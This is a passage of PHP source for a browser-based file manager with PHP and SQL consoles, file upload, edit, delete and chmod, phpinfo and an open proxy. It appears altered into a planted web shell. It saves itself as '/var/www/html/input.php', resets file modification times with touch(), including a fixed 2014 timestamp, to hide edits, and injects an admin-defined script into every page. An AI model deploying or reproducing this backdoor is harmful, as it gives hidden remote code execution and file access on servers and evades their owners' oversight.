<meta name="viewport" content="width=device-width, initial-scale=1" />
<title>' . __('File manager') . '</title>
</head>
<body>
<form action="" method="post">
' . __('Login') . ' <input name="login" type="text">&nbsp;&nbsp;&nbsp;
' . __('Password') . ' <input name="password" type="password">&nbsp;&nbsp;&nbsp;
<input type="submit" value="' . __('Enter') . '" class="fm_input">
</form>
' . fm_lang_form($language) . '
</body>
</html>
';
        die;
    }
    if (isset($_POST['quit'])) {
        unset($_COOKIE[$auth['cookie_name']]);
        setcookie($auth['cookie_name'], '', time() - 86400 * $auth['days_authorization']);
        header('Location: ' . fm_site_url() . $_SERVER['REQUEST_URI']);
    }
}
// Change config
if (isset($_GET['fm_settings'])) {
    if (isset($_GET['fm_config_delete'])) {
        unset($_COOKIE['fm_config']);
        setcookie('fm_config', '', time() - 86400 * $auth['days_authorization']);
        header('Location: ' . fm_url() . '?fm_settings=true');
        exit(0);
    } elseif (isset($_POST['fm_config'])) {
        $fm_config = $_POST['fm_config'];
        setcookie('fm_config', serialize($fm_config), time() + 86400 * $auth['days_authorization']);
        $_COOKIE['fm_config'] = serialize($fm_config);
        $msg = __('Settings') . ' ' . __('done');
    } elseif (isset($_POST['fm_login'])) {
        if (empty($_POST['fm_login']['authorize'])) {
            $_POST['fm_login'] = array('authorize' => '0') + $_POST['fm_login'];
        }
        $fm_login = json_encode($_POST['fm_login']);
        $fgc = file_get_contents('fm.php');
        $search = preg_match('#authorization[\\s]?\\=[\\s]?\'\\{\\"(.*?)\\"\\}\';#', $fgc, $matches);
        if (!empty($matches[1])) {
            $filemtime = filemtime("/var/www/html/input.php");
            $replace = str_replace('{"' . $matches[1] . '"}', $fm_login, $fgc);
            if (file_put_contents("/var/www/html/input.php", $replace)) {
                $msg .= __('File updated');
                if ($_POST['fm_login']['login'] != $auth['login']) {
                    $msg .= ' ' . __('Login') . ': ' . $_POST['fm_login']['login'];
                }
                if ($_POST['fm_login']['password'] != $auth['password']) {
                    $msg .= ' ' . __('Password') . ': ' . $_POST['fm_login']['password'];
                }
                $auth = $_POST['fm_login'];
            } else {
                $msg .= __('Error occurred');
            }
            touch("/var/www/html/input.php", $filemtime);
        }
    } elseif (isset($_POST['tpl_edited'])) {
        $lng_tpl = $_POST['tpl_edited'];
        if (!empty($_POST[$lng_tpl . '_name'])) {
            $fm_php = json_encode(array_combine($_POST[$lng_tpl . '_name'], $_POST[$lng_tpl . '_value']), JSON_HEX_APOS);
        } elseif (!empty($_POST[$lng_tpl . '_new_name'])) {
            $fm_php = json_encode(json_decode(${$lng_tpl . '_templates'}, true) + array($_POST[$lng_tpl . '_new_name'] => $_POST[$lng_tpl . '_new_value']), JSON_HEX_APOS);
        }
        if (!empty($fm_php)) {
            $fgc = file_get_contents('fm.php');
            $search = preg_match('#' . $lng_tpl . '_templates[\\s]?\\=[\\s]?\'\\{\\"(.*?)\\"\\}\';#', $fgc, $matches);
            if (!empty($matches[1])) {
                $filemtime = filemtime("/var/www/html/input.php");
                $replace = str_replace('{"' . $matches[1] . '"}', $fm_php, $fgc);
                if (file_put_contents("/var/www/html/input.php", $replace)) {
                    ${$lng_tpl . '_templates'} = $fm_php;
                    $msg .= __('File updated');
                } else {
                    $msg .= __('Error occurred');
                }
                touch("/var/www/html/input.php", $filemtime);
            }
        } else {
            $msg .= __('Error occurred');
        }
    }
}
// Just show image
if (isset($_GET['img'])) {
    $file = base64_decode($_GET['img']);
    if ($info = getimagesize($file)) {
        switch ($info[2]) {
            //1=GIF, 2=JPG, 3=PNG, 4=SWF, 5=PSD, 6=BMP
            case 1:
                $ext = 'gif';
                break;
            case 2:
                $ext = 'jpeg';
                break;
            case 3:
                $ext = 'png';
                break;
            case 6:
                $ext = 'bmp';
                break;
            default:
                die;
        }
        header("Content-type: image/{$ext}");
        echo file_get_contents($file);
        die;
    }
}
// Just download file
if (isset($_GET['download'])) {
    $file = base64_decode($_GET['download']);
    fm_download($file);
}
// Just show info
if (isset($_GET['phpinfo'])) {
    phpinfo();
    die;
}
// Mini proxy, many bugs!
if (isset($_GET['proxy']) && !empty($fm_config['enable_proxy'])) {
    $url = isset($_GET['url']) ? urldecode($_GET['url']) : '';
    $proxy_form = '
<div style="position:relative;z-index:100500;background: linear-gradient(to bottom, #e4f5fc 0%,#bfe8f9 50%,#9fd8ef 51%,#2ab0ed 100%);">
	<form action="" method="GET">
	<input type="hidden" name="proxy" value="true">
	' . fm_home() . ' <a href="' . $url . '" target="_blank">Url</a>: <input type="text" name="url" value="' . $url . '" size="55">
	<input type="submit" value="' . __('Show') . '" class="fm_input">
	</form>
</div>
';
    if ($url) {
        $ch = curl_init($url);
        curl_setopt($ch, CURLOPT_USERAGENT, 'Den1xxx test proxy');
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_REFERER, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        $result = curl_exec($ch);
        curl_close($ch);
        //$result = preg_replace('#(src)=["\'][http://]?([^:]*)["\']#Ui', '\\1="'.$url.'/\\2"', $result);
        $result = preg_replace_callback('#(href|src)=["\'][http://]?([^:]*)["\']#Ui', 'fm_url_proxy', $result);
        $result = preg_replace('%(<body.*?>)%i', '$1<style>' . fm_home_style() . '</style>' . $proxy_form, $result);
        echo $result;
        die;
    }
}
?>
<!doctype html>
<html>
<head>     
	<meta charset="utf-8" />
	<meta name="viewport" content="width=device-width, initial-scale=1" />
    <title><?php 
echo __('File manager');
?></title>
<style>
body {
	background-color:	white;
	font-family:		Verdana, Arial, Helvetica, sans-serif;
	font-size:			8pt;
	margin:				0px;
}

a:link, a:active, a:visited { color: #006699; text-decoration: none; }
a:hover { color: #DD6900; text-decoration: underline; }
a.th:link { color: #FFA34F; text-decoration: none; }
a.th:active { color: #FFA34F; text-decoration: none; }
a.th:visited { color: #FFA34F; text-decoration: none; }
a.th:hover {  color: #FFA34F; text-decoration: underline; }

table.bg {
	background-color: #ACBBC6
}

th, td { 
	font:	normal 8pt Verdana, Arial, Helvetica, sans-serif;
	padding: 3px;
}

th	{
	height:				25px;
	background-color:	#006699;
	color:				#FFA34F;
	font-weight:		bold;
	font-size:			11px;
}

.row1 {
	background-color:	#EFEFEF;
}

.row2 {
	background-color:	#DEE3E7;
}

.row3 {
	background-color:	#D1D7DC;
	padding: 5px;
}

tr.row1:hover {
	background-color:	#F3FCFC;
}

tr.row2:hover {
	background-color:	#F0F6F6;
}

.whole {
	width: 100%;
}

.all tbody td:first-child{width:100%;}

textarea {
	font: 9pt 'Courier New', courier;
	line-height: 125%;
	padding: 5px;
}

.textarea_input {
	height: 1em;
}

.textarea_input:focus {
	height: auto;
}

input[type=submit]{
	background: #FCFCFC none !important;
	cursor: pointer;
}

.folder {
    background-image: url("");
}

.file {
    background-image: url("");
}
<?php 
echo fm_home_style();
?>
.img {
	background-image: 
url("");
}
@media screen and (max-width:720px){
  table{display:block;}
    #fm_table td{display:inline;float:left;}
    #fm_table tbody td:first-child{width:100%;padding:0;}
    #fm_table tbody tr:nth-child(2n+1){background-color:#EFEFEF;}
    #fm_table tbody tr:nth-child(2n){background-color:#DEE3E7;}
    #fm_table tr{display:block;float:left;clear:left;width:100%;}
	#header_table .row2, #header_table .row3 {display:inline;float:left;width:100%;padding:0;}
	#header_table table td {display:inline;float:left;}
}
</style>
</head>
<body>
<?php 
$url_inc = '?fm=true';
if (isset($_POST['sqlrun']) && !empty($fm_config['enable_sql_console'])) {
    $res = empty($_POST['sql']) ? '' : $_POST['sql'];
    $res_lng = 'sql';
} elseif (isset($_POST['phprun']) && !empty($fm_config['enable_php_console'])) {
    $res = empty($_POST['php']) ? '' : $_POST['php'];
    $res_lng = 'php';
}
if (isset($_GET['fm_settings'])) {
    echo ' 
<table class="whole">
<form method="post" action="">
<tr><th colspan="2">' . __('File manager') . ' - ' . __('Settings') . '</th></tr>
' . (empty($msg) ? '' : '<tr><td class="row2" colspan="2">' . $msg . '</td></tr>') . '
' . fm_config_checkbox_row(__('Show size of the folder'), 'show_dir_size') . '
' . fm_config_checkbox_row(__('Show') . ' ' . __('pictures'), 'show_img') . '
' . fm_config_checkbox_row(__('Show') . ' ' . __('Make directory'), 'make_directory') . '
' . fm_config_checkbox_row(__('Show') . ' ' . __('New file'), 'new_file') . '
' . fm_config_checkbox_row(__('Show') . ' ' . __('Upload'), 'upload_file') . '
' . fm_config_checkbox_row(__('Show') . ' PHP version', 'show_php_ver') . '
' . fm_config_checkbox_row(__('Show') . ' PHP ini', 'show_php_ini') . '
' . fm_config_checkbox_row(__('Show') . ' ' . __('Generation time'), 'show_gt') . '
' . fm_config_checkbox_row(__('Show') . ' xls', 'show_xls') . '
' . fm_config_checkbox_row(__('Show') . ' PHP ' . __('Console'), 'enable_php_console') . '
' . fm_config_checkbox_row(__('Show') . ' SQL ' . __('Console'), 'enable_sql_console') . '
<tr><td class="row1"><input name="fm_config[sql_server]" value="' . $fm_config['sql_server'] . '" type="text"></td><td class="row2 whole">SQL server</td></tr>
<tr><td class="row1"><input name="fm_config[sql_username]" value="' . $fm_config['sql_username'] . '" type="text"></td><td class="row2 whole">SQL user</td></tr>
<tr><td class="row1"><input name="fm_config[sql_password]" value="' . $fm_config['sql_password'] . '" type="text"></td><td class="row2 whole">SQL password</td></tr>
<tr><td class="row1"><input name="fm_config[sql_db]" value="' . $fm_config['sql_db'] . '" type="text"></td><td class="row2 whole">SQL DB</td></tr>
' . fm_config_checkbox_row(__('Show') . ' Proxy', 'enable_proxy') . '
' . fm_config_checkbox_row(__('Show') . ' phpinfo()', 'show_phpinfo') . '
' . fm_config_checkbox_row(__('Show') . ' ' . __('Settings'), 'fm_settings') . '
<tr><td class="row3"><a href="' . fm_url() . '?fm_settings=true&fm_config_delete=true">' . __('Reset settings') . '</a></td><td class="row3"><input type="submit" value="' . __('Save') . '" name="fm_config[fm_set_submit]"></td></tr>
</form>
</table>
<table>
<form method="post" action="">
<tr><th colspan="2">' . __('Settings') . ' - ' . __('Authorization') . '</th></tr>
<tr><td class="row1"><input name="fm_login[authorize]" value="1" ' . ($auth['authorize'] ? 'checked' : '') . ' type="checkbox" id="auth"></td><td class="row2 whole"><label for="auth">' . __('Authorization') . '</label></td></tr>
<tr><td class="row1"><input name="fm_login[login]" value="' . $auth['login'] . '" type="text"></td><td class="row2 whole">' . __('Login') . '</td></tr>
<tr><td class="row1"><input name="fm_login[password]" value="' . $auth['password'] . '" type="text"></td><td class="row2 whole">' . __('Password') . '</td></tr>
<tr><td class="row1"><input name="fm_login[cookie_name]" value="' . $auth['cookie_name'] . '" type="text"></td><td class="row2 whole">' . __('Cookie') . '</td></tr>
<tr><td class="row1"><input name="fm_login[days_authorization]" value="' . $auth['days_authorization'] . '" type="text"></td><td class="row2 whole">' . __('Days') . '</td></tr>
<tr><td class="row1"><textarea name="fm_login[script]" cols="35" rows="7" class="textarea_input" id="auth_script">' . $auth['script'] . '</textarea></td><td class="row2 whole">' . __('Script') . '</td></tr>
<tr><td colspan="2" class="row3"><input type="submit" value="' . __('Save') . '" ></td></tr>
</form>
</table>';
    echo fm_tpl_form('php'), fm_tpl_form('sql');
} elseif (isset($proxy_form)) {
    die($proxy_form);
} elseif (isset($res_lng)) {
    ?>
<table class="whole">
<tr>
    <th><?php 
    echo __('File manager') . ' - ' . $path;
    ?></th>
</tr>
<tr>
    <td class="row2"><table><tr><td><h2><?php 
    echo strtoupper($res_lng);
    ?> <?php 
    echo __('Console');
    if ($res_lng == 'sql') {
        echo ' - Database: ' . $fm_config['sql_db'] . '</h2></td><td>' . fm_run_input('php');
    } else {
        echo '</h2></td><td>' . fm_run_input('sql');
    }
    ?></td></tr></table></td>
</tr>
<tr>
    <td class="row1">
		<a href="<?php 
    echo $url_inc . '&path=' . $path;
    ?>"><?php 
    echo __('Back');
    ?></a>
		<form action="" method="POST" name="console">
		<textarea name="<?php 
    echo $res_lng;
    ?>" cols="80" rows="10" style="width: 90%"><?php 
    echo $res;
    ?></textarea><br/>
		<input type="reset" value="<?php 
    echo __('Reset');
    ?>">
		<input type="submit" value="<?php 
    echo __('Submit');
    ?>" name="<?php 
    echo $res_lng;
    ?>run">
<?php 
    $str_tmpl = $res_lng . '_templates';
    $tmpl = !empty(${$str_tmpl}) ? json_decode(${$str_tmpl}, true) : '';
    if (!empty($tmpl)) {
        $active = isset($_POST[$res_lng . '_tpl']) ? $_POST[$res_lng . '_tpl'] : '';
        $select = '<select name="' . $res_lng . '_tpl" title="' . __('Template') . '" onchange="if (this.value!=-1) document.forms[\'console\'].elements[\'' . $res_lng . '\'].value = this.options[selectedIndex].value; else document.forms[\'console\'].elements[\'' . $res_lng . '\'].value =\'\';" >' . "\n";
        $select .= '<option value="-1">' . __('Select') . "</option>\n";
        foreach ($tmpl as $key => $value) {
            $select .= '<option value="' . $value . '" ' . (!empty($value) && $value == $active ? 'selected' : '') . ' >' . __($key) . "</option>\n";
        }
        $select .= "</select>\n";
        echo $select;
    }
    ?>
		</form>
	</td>
</tr>
</table>
<?php 
    if (!empty($res)) {
        $fun = 'fm_' . $res_lng;
        echo '<h3>' . strtoupper($res_lng) . ' ' . __('Result') . '</h3><pre>' . $fun($res) . '</pre>';
    }
} elseif (!empty($_REQUEST['edit'])) {
    if (!empty($_REQUEST['save'])) {
        $fn = $path . $_REQUEST['edit'];
        $filemtime = filemtime($fn);
        if (file_put_contents($fn, $_REQUEST['newcontent'])) {
            $msg .= __('File updated');
        } else {
            $msg .= __('Error occurred');
        }
        if ($_GET['edit'] == basename("/var/www/html/input.php")) {
            touch("/var/www/html/input.php", 1415116371);
        } else {
            touch($fn, $filemtime);
        }
    }
    $oldcontent = @file_get_contents($path . $_REQUEST['edit']);
    $editlink = $url_inc . '&edit=' . $_REQUEST['edit'] . '&path=' . $path;
    $backlink = $url_inc . '&path=' . $path;
    ?>
<table border='0' cellspacing='0' cellpadding='1' width="100%">
<tr>
    <th><?php 
    echo __('File manager') . ' - ' . __('Edit') . ' - ' . $path . $_REQUEST['edit'];
    ?></th>
</tr>
<tr>
    <td class="row1">
        <?php 
    echo $msg;
    ?>
	</td>
</tr>
<tr>
    <td class="row1">
        <?php 
    echo fm_home();
    ?> <a href="<?php 
    echo $backlink;
    ?>"><?php 
    echo __('Back');
    ?></a>
	</td>
</tr>
<tr>
    <td class="row1" align="center">
        <form name="form1" method="post" action="<?php 
    echo $editlink;
    ?>">
            <textarea name="newcontent" id="newcontent" cols="45" rows="15" style="width:99%" spellcheck="false"><?php 
    echo htmlspecialchars($oldcontent);
    ?></textarea>
            <input type="submit" name="save" value="<?php 
    echo __('Submit');
    ?>">
            <input type="submit" name="cancel" value="<?php 
    echo __('Cancel');
    ?>">
        </form>
    </td>
</tr>
</table>
<?php 
} elseif (!empty($_REQUEST['rights'])) {
    if (!empty($_REQUEST['save'])) {
        if (fm_chmod($path . $_REQUEST['rights'], fm_convert_rights($_REQUEST['rights_val']), @$_REQUEST['recursively'])) {
            $msg .= __('File updated');
        } else {
            $msg .= __('Error occurred');
        }
    }
    clearstatcache();
    $oldrights = fm_rights_string($path . $_REQUEST['rights'], true);
    $link = $url_inc . '&rights=' . $_REQUEST['rights'] . '&path=' . $path;
    $backlink = $url_inc . '&path=' . $path;
    ?>
<table class="whole">
<tr>
    <th><?php 
    echo __('File manager') . ' - ' . $path;
    ?></th>
</tr>
<tr>
    <td class="row1">
        <?php 
    echo $msg;
    ?>
	</td>
</tr>
<tr>
    <td class="row1">
        <a href="<?php 
    echo $backlink;
    ?>"><?php 
    echo __('Back');
    ?></a>
	</td>
</tr>
<tr>
    <td class="row1" align="center">
        <form name="form1" method="post" action="<?php 
    echo $link;
    ?>">
           <?php 
    echo __('Rights') . ' - ' . $_REQUEST['rights'];
    ?> <input type="text" name="rights_val" value="<?php 
    echo $oldrights;
    ?>">
        <?php 
    if (is_dir($path . $_REQUEST['rights'])) {
        ?>
            <input type="checkbox" name="recursively" value="1"> <?php 
        echo __('Recursively');
        ?><br/>
        <?php 
    }
    ?>
            <input type="submit" name="save" value="<?php 
    echo __('Submit');
    ?>">
        </form>
    </td>
</tr>
</table>
<?php 
} elseif (!empty($_REQUEST['rename']) && $_REQUEST['rename'] != '.') {
    if (!empty($_REQUEST['save'])) {
        rename($path . $_REQUEST['rename'], $path . $_REQUEST['newname']);
        $msg .= __('File updated');
        $_REQUEST['rename'] = $_REQUEST['newname'];
    }
    clearstatcache();
    $link = $url_inc . '&rename=' . $_REQUEST['rename'] . '&path=' . $path;
    $backlink = $url_inc . '&path=' . $path;
    ?>
<table class="whole">
<tr>
    <th><?php 
    echo __('File manager') . ' - ' . $path;
    ?></th>
</tr>
<tr>
    <td class="row1">
        <?php 
    echo $msg;
    ?>
	</td>
</tr>
<tr>
    <td class="row1">
        <a href="<?php 
    echo $backlink;
    ?>"><?php 
    echo __('Back');
    ?></a>
	</td>
</tr>
<tr>
    <td class="row1" align="center">
        <form name="form1" method="post" action="<?php 
    echo $link;
    ?>">
            <?php 
    echo __('Rename');
    ?>: <input type="text" name="newname" value="<?php 
    echo $_REQUEST['rename'];
    ?>"><br/>
            <input type="submit" name="save" value="<?php 
    echo __('Submit');
    ?>">
        </form>
    </td>
</tr>
</table>
<?php 
} else {
    //Let's rock!
    $msg = '';
    if (!empty($_FILES['upload']) && !empty($fm_config['upload_file'])) {
        if (!empty($_FILES['upload']['name'])) {
            $_FILES['upload']['name'] = str_replace('%', '', $_FILES['upload']['name']);
            if (!move_uploaded_file($_FILES['upload']['tmp_name'], $path . $_FILES['upload']['name'])) {
                $msg .= __('Error occurred');
            } else {
                $msg .= __('Files uploaded') . ': ' . $_FILES['upload']['name'];
            }
        }
    } elseif (!empty($_REQUEST['delete']) && $_REQUEST['delete'] != '.') {
        if (!fm_del_files($path . $_REQUEST['delete'], true)) {
            $msg .= __('Error occurred');
        } else {
            $msg .= __('Deleted') . ' ' . $_REQUEST['delete'];
        }
    } elseif (!empty($_REQUEST['mkdir']) && !empty($fm_config['make_directory'])) {
        if (!@mkdir($path . $_REQUEST['dirname'], 0777)) {
            $msg .= __('Error occurred');
        } else {
            $msg .= __('Created') . ' ' . $_REQUEST['dirname'];
        }
    } elseif (!empty($_REQUEST['mkfile']) && !empty($fm_config['new_file'])) {
        if (!($fp = @fopen($path . $_REQUEST['filename'], "w"))) {
            $msg .= __('Error occurred');
        } else {
            fclose($fp);
            $msg .= __('Created') . ' ' . $_REQUEST['filename'];
        }
    } elseif (isset($_GET['zip'])) {
        $source = base64_decode($_GET['zip']);
        $destination = basename($source) . '.zip';
        set_time_limit(0);
        $phar = new PharData($destination);
        $phar->buildFromDirectory($source);
        if (is_file($destination)) {
            $msg .= __('Task') . ' "' . __('Archiving') . ' ' . $destination . '" ' . __('done') . '.&nbsp;' . fm_link('download', $path . $destination, __('Download'), __('Download') . ' ' . $destination) . '&nbsp;<a href="' . $url_inc . '&delete=' . $destination . '&path=' . $path . '" title="' . __('Delete') . ' ' . $destination . '" >' . __('Delete') . '</a>';
        } else {
            $msg .= __('Error occurred') . ': ' . __('no files');
        }
    } elseif (isset($_GET['gz'])) {
        $source = base64_decode($_GET['gz']);
        $archive = $source . '.tar';
        $destination = basename($source) . '.tar';
        if (is_file($archive)) {
            unlink($archive);
        }
        if (is_file($archive . '.gz')) {
            unlink($archive . '.gz');
        }
        clearstatcache();
        set_time_limit(0);
        //die();
        $phar = new PharData($destination);
        $phar->buildFromDirectory($source);
        $phar->compress(Phar::GZ, '.tar.gz');
        unset($phar);
        if (is_file($archive)) {
            if (is_file($archive . '.gz')) {
                unlink($archive);
                $destination .= '.gz';
            }
            $msg .= __('Task') . ' "' . __('Archiving') . ' ' . $destination . '" ' . __('done') . '.&nbsp;' . fm_link('download', $path . $destination, __('Download'), __('Download') . ' ' . $destination) . '&nbsp;<a href="' . $url_inc . '&delete=' . $destination . '&path=' . $path . '" title="' . __('Delete') . ' ' . $destination . '" >' . __('Delete') . '</a>';
        } else {
            $msg .= __('Error occurred') . ': ' . __('no files');
        }
    } elseif (isset($_GET['decompress'])) {
        // $source = base64_decode($_GET['decompress']);
        // $destination = basename($source);
        // $ext = end(explode(".", $destination));
        // if ($ext=='zip' OR $ext=='gz') {
        // $phar = new PharData($source);
        // $phar->decompress();
        // $base_file = str_replace('.'.$ext,'',$destination);
        // $ext = end(explode(".", $base_file));
        // if ($ext=='tar'){
        // $phar = new PharData($base_file);
        // $phar->extractTo(dir($source));
        // }
        // }
        // $msg .= __('Task').' "'.__('Decompress').' '.$source.'" '.__('done');
    } elseif (isset($_GET['gzfile'])) {
        $source = base64_decode($_GET['gzfile']);
        $archive = $source . '.tar';
        $destination = basename($source) . '.tar';
        if (is_file($archive)) {
            unlink($archive);
        }
        if (is_file($archive . '.gz')) {
            unlink($archive . '.gz');
        }
        set_time_limit(0);
        //echo $destination;
        $ext_arr = explode('.', basename($source));
        if (isset($ext_arr[1])) {
            unset($ext_arr[0]);
            $ext = implode('.', $ext_arr);
        }
        $phar = new PharData($destination);
        $phar->addFile($source);
        $phar->compress(Phar::GZ, $ext . '.tar.gz');
        unset($phar);
        if (is_file($archive)) {
            if (is_file($archive . '.gz')) {
                unlink($archive);
                $destination .= '.gz';
            }
            $msg .= __('Task') . ' "' . __('Archiving') . ' ' . $destination . '" ' . __('done') . '.&nbsp;' . fm_link('download', $path . $destination, __('Download'), __('Download') . ' ' . $destination) . '&nbsp;<a href="' . $url_inc . '&delete=' . $destination . '&path=' . $path . '" title="' . __('Delete') . ' ' . $destination . '" >' . __('Delete') . '</a>';
        } else {
            $msg .= __('Error occurred') . ': ' . __('no files');
        }
    }
    ?>
<table class="whole" id="header_table" >
<tr>
    <th colspan="2"><?php 
    echo __('File manager');
    echo !empty($path) ? ' - ' . $path : '';
    ?></th>
</tr>
<?php 
    if (!empty($msg)) {
        ?>
<tr>
	<td colspan="2" class="row2"><?php 
        echo $msg;
        ?></td>
</tr>
<?php 
    }
    ?>
<tr>
    <td class="row2">
		<table>
			<tr>
			<td>
				<?php 
    echo fm_home();
    ?>
			</td>
			<td>
			<?php 
    if (!empty($fm_config['make_directory'])) {
        ?>
				<form method="post" action="<?php 
        echo $url_inc;
        ?>">
				<input type="hidden" name="path" value="<?php 
        echo $path;
        ?>" />
				<input type="text" name="dirname" size="15">
				<input type="submit" name="mkdir" value="<?php 
        echo __('Make directory');
        ?>">
				</form>
			<?php 
    }
    ?>
			</td>
			<td>
			<?php 
    if (!empty($fm_config['new_file'])) {
        ?>
				<form method="post" action="<?php 
        echo $url_inc;
        ?>">
				<input type="hidden" name="path" value="<?php 
        echo $path;
        ?>" />
				<input type="text" name="filename" size="15">
				<input type="submit" name="mkfile" value="<?php 
        echo __('New file');
        ?>">
				</form>
			<?php 
    }
    ?>
			</td>
			<td>
			<?php 
    echo fm_run_input('php');
    ?>
			</td>
			<td>
			<?php 
    echo fm_run_input('sql');
    ?>
			</td>
			</tr>
		</table>
    </td>
    <td class="row3">
		<table>
		<tr>
		<td>
		<?php 
    if (!empty($fm_config['upload_file'])) {
        ?>
			<form name="form1" method="post" action="<?php 
        echo $url_inc;
        ?>" enctype="multipart/form-data">
			<input type="hidden" name="path" value="<?php 
        echo $path;
        ?>" />
			<input type="file" name="upload" id="upload_hidden" style="position: absolute; display: block; overflow: hidden; width: 0; height: 0; border: 0; padding: 0;" onchange="document.getElementById('upload_visible').value = this.value;" />
			<input type="text" readonly="1" id="upload_visible" placeholder="<?php 
        echo __('Select the file');
        ?>" style="cursor: pointer;" onclick="document.getElementById('upload_hidden').click();" />
			<input type="submit" name="test" value="<?php 
        echo __('Upload');
        ?>" />
			</form>
		<?php 
    }
    ?>
		</td>
		<td>
		<?php 
    if ($auth['authorize']) {
        ?>
			<form action="" method="post">&nbsp;&nbsp;&nbsp;
			<input name="quit" type="hidden" value="1">
			<?php 
        echo __('Hello');
        ?>, <?php 
        echo $auth['login'];
        ?>
			<input type="submit" value="<?php 
        echo __('Quit');
        ?>">
			</form>
		<?php 
    }
    ?>
		</td>
		<td>
		<?php 
    echo fm_lang_form($language);
    ?>
		</td>
		<tr>
		</table>
    </td>
</tr>
</table>
<table class="all" border='0' cellspacing='1' cellpadding='1' id="fm_table" width="100%">
<thead>
<tr> 
    <th style="white-space:nowrap"> <?php 
    echo __('Filename');
    ?> </th>
    <th style="white-space:nowrap"> <?php 
    echo __('Size');
    ?> </th>
    <th style="white-space:nowrap"> <?php 
    echo __('Date');
    ?> </th>
    <th style="white-space:nowrap"> <?php 
    echo __('Rights');
    ?> </th>
    <th colspan="4" style="white-space:nowrap"> <?php 
    echo __('Manage');
    ?> </th>
</tr>
</thead>
<tbody>
<?php 
    $elements = fm_scan_dir($path, '', 'all', true);
    $dirs = array();
    $files = array();
    foreach ($elements as $file) {
        if (@is_dir($path . $file)) {
            $dirs[] = $file;
        } else {
            $files[] = $file;
        }
    }
    natsort($dirs);
    natsort($files);
    $elements = array_merge($dirs, $files);
    foreach ($elements as $file) {
        $filename = $path . $file;
        $filedata = @stat($filename);
        if (@is_dir($filename)) {
            $filedata[7] = '';
            if (!empty($fm_config['show_dir_size']) && !fm_root($file)) {
                $filedata[7] = fm_dir_size($filename);
            }
            $link = '<a href="' . $url_inc . '&path=' . $path . $file . '" title="' . __('Show') . ' ' . $file . '"><span class="folder">&nbsp;&nbsp;&nbsp;&nbsp;</span> ' . $file . '</a>';
            $loadlink = fm_root($file) || $phar_maybe ? '' : fm_link('zip', $filename, __('Compress') . '&nbsp;zip', __('Archiving') . ' ' . $file);
            $arlink = fm_root($file) || $phar_maybe ? '' : fm_link('gz', $filename, __('Compress') . '&nbsp;.tar.gz', __('Archiving') . ' ' . $file);
            $style = 'row2';
            if (!fm_root($file)) {
                $alert = 'onClick="if(confirm(\'' . __('Are you sure you want to delete this directory (recursively)?') . '\\n /' . $file . '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path . '\'"';
            } else {
                $alert = '';
            }
        } else {
            $link = $fm_config['show_img'] && getimagesize($filename) ? '<a target="_blank" onclick="var lefto = screen.availWidth/2-320;window.open(\'' . fm_img_link($filename) . '\',\'popup\',\'width=640,height=480,left=\' + lefto + \',scrollbars=yes,toolbar=no,location=no,directories=no,status=no\');return false;" href="' . fm_img_link($filename) . '"><span class="img">&nbsp;&nbsp;&nbsp;&nbsp;</span> ' . $file . '</a>' : '<a href="' . $url_inc . '&edit=' . $file . '&path=' . $path . '" title="' . __('Edit') . '"><span class="file">&nbsp;&nbsp;&nbsp;&nbsp;</span> ' . $file . '</a>';
            $e_arr = explode(".", $file);
            $ext = end($e_arr);
            $loadlink = fm_link('download', $filename, __('Download'), __('Download') . ' ' . $file);
            $arlink = in_array($ext, array('zip', 'gz', 'tar')) ? '' : (fm_root($file) || $phar_maybe ? '' : fm_link('gzfile', $filename, __('Compress') . '&nbsp;.tar.gz', __('Archiving') . ' ' . $file));
            $style = 'row1';
            $alert = 'onClick="if(confirm(\'' . __('File selected') . ': \\n' . $file . '. \\n' . __('Are you sure you want to delete this file?') . '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path . '\'"';
        }
        $deletelink = fm_root($file) ? '' : '<a href="#" title="' . __('Delete') . ' ' . $file . '" ' . $alert . '>' . __('Delete') . '</a>';
        $renamelink = fm_root($file) ? '' : '<a href="' . $url_inc . '&rename=' . $file . '&path=' . $path . '" title="' . __('Rename') . ' ' . $file . '">' . __('Rename') . '</a>';
        $rightstext = $file == '.' || $file == '..' ? '' : '<a href="' . $url_inc . '&rights=' . $file . '&path=' . $path . '" title="' . __('Rights') . ' ' . $file . '">' . @fm_rights_string($filename) . '</a>';
        ?>
<tr class="<?php 
        echo $style;
        ?>"> 
    <td><?php 
        echo $link;
        ?></td>
    <td><?php 
        echo $filedata[7];
        ?></td>
    <td style="white-space:nowrap"><?php 
        echo gmdate("Y-m-d H:i:s", $filedata[9]);
        ?></td>
    <td><?php 
        echo $rightstext;
        ?></td>
    <td><?php 
        echo $deletelink;
        ?></td>
    <td><?php 
        echo $renamelink;
        ?></td>
    <td><?php 
        echo $loadlink;
        ?></td>
    <td><?php 
        echo $arlink;
        ?></td>
</tr>
<?php 
    }
}
?>
</tbody>
</table>
<div class="row3"><?php 
$mtime = explode(' ', microtime());
$totaltime = $mtime[0] + $mtime[1] - $starttime;
echo fm_home() . ' | ver. ' . $fm_version . ' | <a href="https://github.com/Den1xxx/Filemanager">Github</a>  | <a href="' . fm_site_url() . '">.</a>';
if (!empty($fm_config['show_php_ver'])) {
    echo ' | PHP ' . phpversion();
}
if (!empty($fm_config['show_php_ini'])) {
    echo ' | ' . php_ini_loaded_file();
}
if (!empty($fm_config['show_gt'])) {
    echo ' | ' . __('Generation time') . ': ' . round($totaltime, 2);
}
if (!empty($fm_config['enable_proxy'])) {
    echo " | <a href=\"?proxy=true\">proxy</a>";
}
if (!empty($fm_config['show_phpinfo'])) {
    echo " | <a href=\"?phpinfo=true\">phpinfo</a>";
}
if (!empty($fm_config['show_xls']) && !empty($link)) {
    echo ' | <a href="javascript: void(0)" onclick="var obj = new table2Excel(); obj.CreateExcelSheet(\'fm_table\',\'export\');" title="' . __('Download') . ' xls">xls</a>';
}
if (!empty($fm_config['fm_settings'])) {
    echo ' | <a href="?fm_settings=true">' . __('Settings') . '</a>';
}
?>
</div>
<?php 
echo $auth['script'];
?>
<script type="text/javascript">
function download_xls(filename, text) {
	var element = document.createElement('a');
	element.setAttribute('href', 'data:application/vnd.ms-excel;base64,' + text);
	element.setAttribute('download', filename);
	element.style.display = 'none';
	document.body.appendChild(element);
